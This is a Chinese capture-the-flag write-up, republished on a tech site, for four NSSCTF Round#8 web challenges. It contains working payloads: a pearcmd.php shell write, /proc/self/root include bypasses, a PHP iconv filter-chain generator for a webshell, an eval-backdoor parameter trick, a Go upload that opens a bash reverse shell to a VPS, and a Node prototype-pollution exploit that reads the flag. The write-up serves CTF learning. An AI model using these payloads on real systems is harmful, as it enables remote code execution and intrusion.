返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >NSSCTF Round#8 web专项赛
  • 491
分享到

NSSCTF Round#8 web专项赛

php开发语言 2023-09-22 19:09:17 491人浏览 薄情痞子
摘要

文章目录 MyPage方法一: pearcmd.php方法二:多级连接绕过方法三: PHP Base64 Filter 宽松解析 MyDoorUpload_gogoggoez_node

文章目录

MyPage

Where is my page?

image-20230211141954633

拿到题目就是这个样子

感觉就是文件包含

image-20230211142049135

可以读取,可以用filter协议

但是index.PHP怎么尝试都没读取到,data和input等协议都被ban了

方法一: pearcmd.php

filter读取不到index.php,可以试试pearcmd.php的姿势写shell

index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/+/tmp/shell.php

image-20230211161238581

利用文件包含漏洞包含这个文件即可

image-20230211161106062

方法二:多级连接绕过

/proc/self/root/多级连接绕过 include_once

?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/index.php
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/flag.php

注意最后是proc/self/cwd/

index.php源码

error_reporting(0);include 'flag.php';if(!isset($_GET['file'])) {    header('Location:/index.php?file=');} else {    $file = $_GET['file'];    if (!preg_match('/\.\.|data|input|glob|global|var|dict|Gopher|file|Http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) {        include_once $file;    } else {        die('error.');    }}

include_once 不能重复包含,然后上面已经有include 'flag.php' 包含了,所以读不到flag.php

至于不能正常读到index.php我比较迷惑,应该是执行这个文件其实已经算包含一遍了,也是include_once的问题,换成include就可以正常读。

/proc/self/root/多级连接绕过原理可参考此文

require_once 绕过不能重复包含文件的限制

方法三: PHP Base64 Filter 宽松解析

我在写这题时候 用了这个方法,不过payload生成可能产生一点问题,复现倒是很顺

$base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"; $conversions = array(    'R' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.Mac.UCS2',    'B' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',    'C' => 'convert.iconv.UTF8.CSISO2022KR',    '8' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',    '9' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',    'f' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',    's' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',    'z' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',    'U' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',    'P' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',    'V' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',    '0' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',    'Y' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',    'W' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',    'd' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',    'D' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',    '7' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',    '4' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2');$filters = "convert.base64-encode|";# make sure to get rid of any equal signs in both the string we just generated and the rest of the file$filters .= "convert.iconv.UTF8.UTF7|";foreach (str_split(strrev($base64_payload)) as $c) {    $filters .= $conversions[$c] . "|";    $filters .= "convert.base64-decode|";    $filters .= "convert.base64-encode|";    $filters .= "convert.iconv.UTF8.UTF7|";}$filters .= "convert.base64-decode";$final_payload = "php://filter/{$filters}/resource=/etc/passwd";echo $final_payload;#var_dump(file_get_contents($final_payload));

image-20230213195251697

MyDoor

一个普通的后门。

这题的初始页面与上题一模一样

不一样的是可以直接伪协议读取到index.php (没用include_once)

image-20230211135232815

能filter伪协议读取到index.php的源码

error_reporting(0);if (isset($_GET['N_S.S'])) {    eval($_GET['N_S.S']);}if(!isset($_GET['file'])) {    header('Location:/index.php?file=');} else {    $file = $_GET['file'];    if (!preg_match('/\.\.|la|data|input|glob|global|var|dict|gopher|file|http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) {        include $file;    } else {        die('error.');    }}

可以利用eval执行命令

 eval($_GET['N_S.S']);

这个参数N_S.S还涉及到了php的非法传参问题

PHP版本小于8时,如果参数中出现中括号[,中括号会被转换成下划线_,但是会出现转换错误导致接下来如果该参数名中还有非法字符并不会继续转换成下划线_,也就是说如果中括号[出现在前面,那么中括号[还是会被转换成下划线_,但是因为出错导致接下来的非法字符并不会被转换成下划线_

那么就可以用N[S.S 传参

flag找了挺久,在环境变量env里面

image-20230211141435871

Upload_gogoggo

没有任何过滤的文件上传!

是一个golang的文件上传 类似于[2022DASCTF MAY 挑战赛] hackme 没有复现吃亏了

之前也没接触很少go的题目

image-20230213151844728

这里上传了个pass.png 可以看到它System output : go pass: unknown command

执行了 go pass的命令

可以上传一个golang命令执行的文件 run.go ,这样就会执行 go run的命令

package mainimport ("fmt""log""os/exec")func main() {cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/vps/ip 0>&1")out, err := cmd.CombinedOutput()if err != nil {fmt.Printf("combined out:\n%s\n", string(out))log.Fatalf("cmd.Run() failed with %s\n", err)}fmt.Printf("combined out:\n%s\n", string(out))}

image-20230213153607946

flag是藏在home下

ez_node

const express = require("express");const path = require("path");const fs = require("fs");const multer = require("multer");const PORT = process.env.port || 3000const app = express();global = "global"app.listen(PORT, () => {    console.log(`listen at ${PORT}`);});function merge(target, source) {    for (let key in source) {        if (key in source && key in target) {            merge(target[key], source[key])        } else {            target[key] = source[key]        }    }}let objMulter = multer({ dest: "./upload" });app.use(objMulter.any());app.use(express.static("./public"));app.post("/upload", (req, res) => {    try{        let oldName = req.files[0].path;        let newName = req.files[0].path + path.parse(req.files[0].originalname).ext;        fs.renameSync(oldName, newName);        res.send({            err: 0,            url:            "./upload/" +            req.files[0].filename +            path.parse(req.files[0].originalname).ext        });    }    catch(error){        res.send(require('./err.js').getRandomErr())    }});app.post('/pollution', require('body-parser').JSON(), (req, res) => {    let data = {};    try{        merge(data, req.body);        res.send('ReGISter successfully!tql')        require('./err.js').getRandomErr()    }    catch(error){        res.send(require('./err.js').getRandomErr())    }})

这题没看懂

http://gtg.ink/ez-node-NSSCTF-round-8/ 出题人的wp

https://blog.csdn.net/weixin_52585514/article/details/128985443 V2师傅的wp

此题类似BalsnCTF 2022 2linenodejs ,v2师傅就直接用这个题的exp打

image-20230213180759793

预期解是

//上传部分obj={    getRandomErr:() => {        return require('child_process').execSync('cat /flag')    }}module.exports = obj//污染部分{"constructor":{    "prototype":{        "data":{            "exports":{                ".":"./16285e8a41e03031c3638c8991393bc8.js"            },            "name":"./err.js"            },            "path":"./upload"        }    }}

来源地址:https://blog.csdn.net/qq_61768489/article/details/129016075

--结束END--

本文标题: NSSCTF Round#8 web专项赛

本文链接: https://lsjlt.com/news/415692.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作